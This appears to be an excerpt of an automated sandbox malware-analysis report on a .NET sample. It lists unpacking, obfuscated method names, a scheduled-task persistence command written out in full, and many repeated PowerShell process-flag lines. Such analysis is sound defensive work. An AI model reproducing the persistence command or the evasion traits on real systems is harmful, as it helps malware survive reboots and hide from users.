                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nufnwZ9IW.exe, 0000000D.00000000.1013826041.000000000013F000.00000002.00000001.01000000.0000000B.sdmp, nufnwZ9IW.exe, 00000010.00000002.3311041959.000000000013F000.00000002.00000001.01000000.0000000B.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Unpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Unpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack
                Source: 0.2.0t7MXNEfCg.exe.49ce5c0.4.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs | .Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.cs | .Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.cs | .Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.9c80000.7.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.32cfdc8.2.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 8.2.HrovwwypYVlFWB.exe.34cec80.1.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0t7MXNEfCg.exe | Static PE information: 0x83BF88F6 [Mon Jan 16 23:02:14 2040 UTC]
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B02CAD5 push FFFFFF8Bh; iretd | 0_2_0B02CAD7
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B024958 push ds; iretd | 0_2_0B024962
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B0298CC push E8FFFFFEh; retf | 0_2_0B0298D1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B024770 push ss; iretd | 0_2_0B02477A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B02477B push ss; iretd | 0_2_0B02478A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B0247AB push ss; iretd | 0_2_0B02477A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0B02AD80 push ds; iretd | 0_2_0B02AD86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004071FF push C35DE58Bh; ret | 7_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00403260 push eax; ret | 7_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00408395 push ss; ret | 7_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004124E9 push eax; retf | 7_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040B528 pushad ; retf | 7_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040D53D push esi; retf | 7_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0041ED9A pushad ; retf | 7_2_0041ED9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0041ED9E pushad ; iretd | 7_2_0041EDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004146A6 push cs; iretd | 7_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00E8225F pushad ; ret | 7_2_00E827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00E827FA pushad ; ret | 7_2_00E827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00E8283D push eax; iretd | 7_2_00E82858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EB09AD push ecx; mov dword ptr [esp], ecx | 7_2_00EB09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00E81368 push eax; iretd | 7_2_00E81369
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Code function: 8_2_0AB1BAB5 push FFFFFF8Bh; iretd | 8_2_0AB1BAB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_012E09AD push ecx; mov dword ptr [esp], ecx | 12_2_012E09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_012B1FEC push eax; iretd | 12_2_012B1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0042E0DA push ds; iretd | 12_2_0042E0E1
                Source: 0t7MXNEfCg.exe | Static PE information: section name: .text entropy: 7.55691519150212
                Source: HrovwwypYVlFWB.exe.0.dr | Static PE information: section name: .text entropy: 7.55691519150212
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, f64iliBPNDre6mPqmX.cs | High entropy of concatenated method names: 'qANf46jscp', 'AjKfteJ7pq', 'fw5f0YVkY1', 'vP90JiT5cr', 'dQl0zXPaDo', 'vM4fUEZciy', 'Al7fR2E6hg', 'vwJfFvtpWf', 'ka6faeKYKo', 'DybfvZ2F3v'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, LEhlTBRUPAutV2WiidS.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FDKSgmQplG', 'yooSLrfmNY', 'QAjS2qYxGG', 'FNJSl8333E', 'LRASPsBTx2', 'MP5SADijOh', 'UsHSNJ2cJu'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | High entropy of concatenated method names: 'glJTlKMkOw', 'MLyTPtb6ta', 'FUBTAHyylZ', 'cSaTNcKco5', 'E40T8lVqdY', 'yTSTXLaIhS', 'cuKT5XQ3Ji', 'ydfTVWiDX1', 'RTWTjcYUc9', 'Dn7TJ2iLef'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hhrS6Q76NDYyAHKd2A.cs | High entropy of concatenated method names: 'O750uftUrP', 'bvM0TAtquh', 'hMS0OhIEw7', 'iY60fM6FC6', 'PY00QGDPpW', 'GLKO8mabjo', 'fDiOXl5TrW', 'vWeO56uORL', 'tSKOV1udis', 'xCNOjoS6Kk'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, Bv1HpA5W3dpr7MvCIY.cs | High entropy of concatenated method names: 'bc1DcnVwjj', 'VOMDGmcN71', 'scCDDB0heR', 'Lv6DEYv2Jn', 'X1EDMO84SC', 'Ie4DxtREPR', 'Dispose', 'L0Hn4BST40', 'bIcnTFuuXm', 'K8AntwnQpc'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, wWTpapXk05j7Eh2DMv.cs | High entropy of concatenated method names: 'EClGVUNjbM', 'Er9GJGcbaN', 'EXQnUTqPpu', 'XZNnRQW3kp', 'mxFGgbRwrv', 'zMCGLjR5TX', 'AKdG2ZM9Xc', 'EXRGllIPx7', 'gFxGPkXsbp', 'J7WGAB4s4P'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, GwBoCeRaNsqCa0eAhje.cs | High entropy of concatenated method names: 's18EJ8mFiu', 'KtXEzvOnth', 'VRB9UQkxAQ', 'SrwAdLjPab0w3vEsRVc', 'wZbOdYjz6nSo9h3upK5', 'OUYx2uAdtyfRMasCoEL', 'EmoymyAiAPYEfU8eqZH', 'eRL8VVAtYVLOZ5w4AlV'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, KSmB67RRfjE53Pem2VD.cs | High entropy of concatenated method names: 'oTjSJk8xfM', 'klTSz7GDt5', 'IPPEU5nRk7', 'Jk4ERV0xBt', 'xoVEF49ZmF', 'hNUEawIdLY', 'kIyEvfQTN6', 'KQHEu4VtbM', 'n8VE4AjVnd', 'r8DETVmPEf'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, TskOeV6g8oIAtWls5Z.cs | High entropy of concatenated method names: 'r3FtWgHHjJ', 'EfGtyaJXvt', 'djstwU00x0', 'Klrt6aQEGr', 'Hs3tcMwU9p', 'QJBtmNrHU0', 'e9MtGobksR', 'bnZtn7b9s5', 'au1tDej6Op', 'CBItSN5fg5'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, jlQchZ2k0fQ3fAmBYM.cs | High entropy of concatenated method names: 'Ws2HwoqQNC', 'IpTH6nIiuv', 'y1GH75MMf6', 'O3oHYhI53Y', 'YGQHk52J6q', 'geyHpMEmWJ', 'DAKHBsFRaE', 'iiWHe3VsMT', 'AQKHdwUg8j', 'u4fHgpJ11u'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, eOhFMaRvKPBteuThA1T.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OrU9Dq3FQv', 'uJc9SGpbWS', 'Rx49EISVC8', 'Cew990y9t4', 'pIC9McZ8aW', 'Lgp9qg2oXr', 'fd39x7VHmj'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, ktXWBOzBckPRrD7caF.cs | High entropy of concatenated method names: 'Un9Sy4VTUt', 'Lm7SwfhlRQ', 'u13S66R2KK', 'mNHS7EyTHG', 'MB7SYefrgm', 'DiwSkpndyg', 'zJXSp6YXNk', 'BNLSxUy1Gl', 'towSZg6b73', 'KFgS300Yig'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, PNEodnCWQKK8QIoXdk.cs | High entropy of concatenated method names: 'jQqOKTxTQE', 'xGsOiY90Pa', 'ltjtr4kpTu', 'jJ8tkerbmL', 'e0ctpxpwd7', 'gj1tbSnv7n', 'piWtBvbCmm', 'em8tesrJZV', 'Mguto0tsjr', 'APVtdfwrX1'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, a2JyCioxnO13TM2WGe.cs | High entropy of concatenated method names: 'tm8fZtVZnl', 'n6df3GTFCa', 'IEEfs2JZra', 'MWcfWNhmQO', 'UIFfKVS2Qu', 'WgOfysrvnY', 'UeifiPpgi2', 'uwffw3Olfc', 'GoBf6FOGir', 'v4RfCm0ayU'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, XR3owhNrauYNYpYcJA.cs | High entropy of concatenated method names: 'xGVGhVDP6q', 'mGcG14RNYC', 'ToString', 'H4IG4pnZ91', 'DLUGTjAxDv', 'ObKGtlpIEO', 's7tGOec4Io', 'Yt4G0sjEqd', 'VifGfiMuit', 'ymRGQgUKj4'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, bDJtAQTauqFQTO0ymb.cs | High entropy of concatenated method names: 'Dispose', 'NprRj7MvCI', 'dpJFYbdOVA', 'APtS2quiwh', 'HXdRJYJKdW', 'zifRzk5hEj', 'ProcessDialogKey', 'W9KFU88PfK', 'AVDFR4qvpI', 'sdYFF4mivk'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, B88PfKjKVD4qvpISdY.cs | High entropy of concatenated method names: 'lZFD7WmVlc', 'OS8DY2rQwF', 'BqGDrCEmwU', 'jbcDk6UdFZ', 'fZiDpwYnCd', 'B7EDb3uIGh', 'd6qDB8lHqT', 'gxrDe5w2pE', 'vWxDolNr7G', 'qXjDdbbO8d'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, ihg39gFVr0Rs0dSEw5.cs | High entropy of concatenated method names: 'wOZsZSB4h', 'pOhWPFKW9', 'F0qyKwe66', 'B8OiTqoTK', 'uRs6KLLPL', 'THrCHRQvf', 'jYjFNGpC9kQdN7ZWof', 'XiyqHvehQ39xl3IhqC', 'JOnnFvVOn', 'cWUSAEPyF'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs | High entropy of concatenated method names: 'YreauYVpRC', 'lfYa4T8Vjy', 'ioMaTM5pWc', 'VWVat9K5Fs', 't0xaO4Eq7e', 'XFUa03hwDw', 'nv2afc2G5E', 'OPWaQZyyxd', 'Eq7aIwLWUv', 'GUfahqiiwe'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, rmSTFhlvm0xFks1ovR.cs | High entropy of concatenated method names: 'GWpcd7ls07', 'zSfcLUwsrK', 'AZ7clJCjjS', 'sJTcPLbydP', 'M9kcY8ajtc', 'EXFcrVs4hB', 'blAckvIDbl', 'xTTcploVOf', 't7Gcbi43tj', 'gmgcB39idD'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, fmivk3JR6hJ4HRtKJs.cs | High entropy of concatenated method names: 'JgBStQNoUD', 'ORnSOCjVD3', 'WI1S0u08Ko', 'jQcSfbKm7i', 'bQESD76EAl', 'sPMSQTQr8a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, tWrtpMvFbRymNUpBNk.cs | High entropy of concatenated method names: 'euHRf6eXSF', 'PUARQ5h51Q', 'Xg8RhoIAtW', 'Qs5R1ZLNEo', 'loXRcdkthr', 's6QRm6NDYy', 'jZerpyM4uoraGCdDd4', 'PNrQTHPu619FSVb3fg', 'YncRRs8Sla', 'FOkRay0xbG'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, uZ81MvAt4DaV2uYW8f.cs | High entropy of concatenated method names: 'ToString', 'dG3mgFVdQ3', 'MZ7mYwacGU', 'ccqmrlm4yX', 'sjQmkcSVhd', 'GyLmpa746B', 'n1Cmbe1afe', 'bTXmB19pUy', 'au5meAfiqU', 'PVtmoGIDxf'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, t5TGUNtKysAnZYRpb5.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'E9jFjvhCdI', 'f2EFJUIBon', 'EEHFzmHcDU', 'gGcaUBGvm4', 'S5IaR443JD', 'KX5aFw7Mrr', 'aOsaaAovNb', 'UCUkWBiXn3ckdd7LIIv'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, a2JyCioxnO13TM2WGe.csHigh entropy of concatenated method names: 'tm8fZtVZnl', 'n6df3GTFCa', 'IEEfs2JZra', 'MWcfWNhmQO', 'UIFfKVS2Qu', 'WgOfysrvnY', 'UeifiPpgi2', 'uwffw3Olfc', 'GoBf6FOGir', 'v4RfCm0ayU'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, XR3owhNrauYNYpYcJA.csHigh entropy of concatenated method names: 'xGVGhVDP6q', 'mGcG14RNYC', 'ToString', 'H4IG4pnZ91', 'DLUGTjAxDv', 'ObKGtlpIEO', 's7tGOec4Io', 'Yt4G0sjEqd', 'VifGfiMuit', 'ymRGQgUKj4'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, bDJtAQTauqFQTO0ymb.csHigh entropy of concatenated method names: 'Dispose', 'NprRj7MvCI', 'dpJFYbdOVA', 'APtS2quiwh', 'HXdRJYJKdW', 'zifRzk5hEj', 'ProcessDialogKey', 'W9KFU88PfK', 'AVDFR4qvpI', 'sdYFF4mivk'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, B88PfKjKVD4qvpISdY.csHigh entropy of concatenated method names: 'lZFD7WmVlc', 'OS8DY2rQwF', 'BqGDrCEmwU', 'jbcDk6UdFZ', 'fZiDpwYnCd', 'B7EDb3uIGh', 'd6qDB8lHqT', 'gxrDe5w2pE', 'vWxDolNr7G', 'qXjDdbbO8d'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, ihg39gFVr0Rs0dSEw5.csHigh entropy of concatenated method names: 'wOZsZSB4h', 'pOhWPFKW9', 'F0qyKwe66', 'B8OiTqoTK', 'uRs6KLLPL', 'THrCHRQvf', 'jYjFNGpC9kQdN7ZWof', 'XiyqHvehQ39xl3IhqC', 'JOnnFvVOn', 'cWUSAEPyF'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.csHigh entropy of concatenated method names: 'YreauYVpRC', 'lfYa4T8Vjy', 'ioMaTM5pWc', 'VWVat9K5Fs', 't0xaO4Eq7e', 'XFUa03hwDw', 'nv2afc2G5E', 'OPWaQZyyxd', 'Eq7aIwLWUv', 'GUfahqiiwe'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, rmSTFhlvm0xFks1ovR.csHigh entropy of concatenated method names: 'GWpcd7ls07', 'zSfcLUwsrK', 'AZ7clJCjjS', 'sJTcPLbydP', 'M9kcY8ajtc', 'EXFcrVs4hB', 'blAckvIDbl', 'xTTcploVOf', 't7Gcbi43tj', 'gmgcB39idD'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, fmivk3JR6hJ4HRtKJs.csHigh entropy of concatenated method names: 'JgBStQNoUD', 'ORnSOCjVD3', 'WI1S0u08Ko', 'jQcSfbKm7i', 'bQESD76EAl', 'sPMSQTQr8a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, tWrtpMvFbRymNUpBNk.csHigh entropy of concatenated method names: 'euHRf6eXSF', 'PUARQ5h51Q', 'Xg8RhoIAtW', 'Qs5R1ZLNEo', 'loXRcdkthr', 's6QRm6NDYy', 'jZerpyM4uoraGCdDd4', 'PNrQTHPu619FSVb3fg', 'YncRRs8Sla', 'FOkRay0xbG'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, uZ81MvAt4DaV2uYW8f.csHigh entropy of concatenated method names: 'ToString', 'dG3mgFVdQ3', 'MZ7mYwacGU', 'ccqmrlm4yX', 'sjQmkcSVhd', 'GyLmpa746B', 'n1Cmbe1afe', 'bTXmB19pUy', 'au5meAfiqU', 'PVtmoGIDxf'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, t5TGUNtKysAnZYRpb5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'E9jFjvhCdI', 'f2EFJUIBon', 'EEHFzmHcDU', 'gGcaUBGvm4', 'S5IaR443JD', 'KX5aFw7Mrr', 'aOsaaAovNb', 'UCUkWBiXn3ckdd7LIIv'
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe File created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe

                Boot Survival

                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
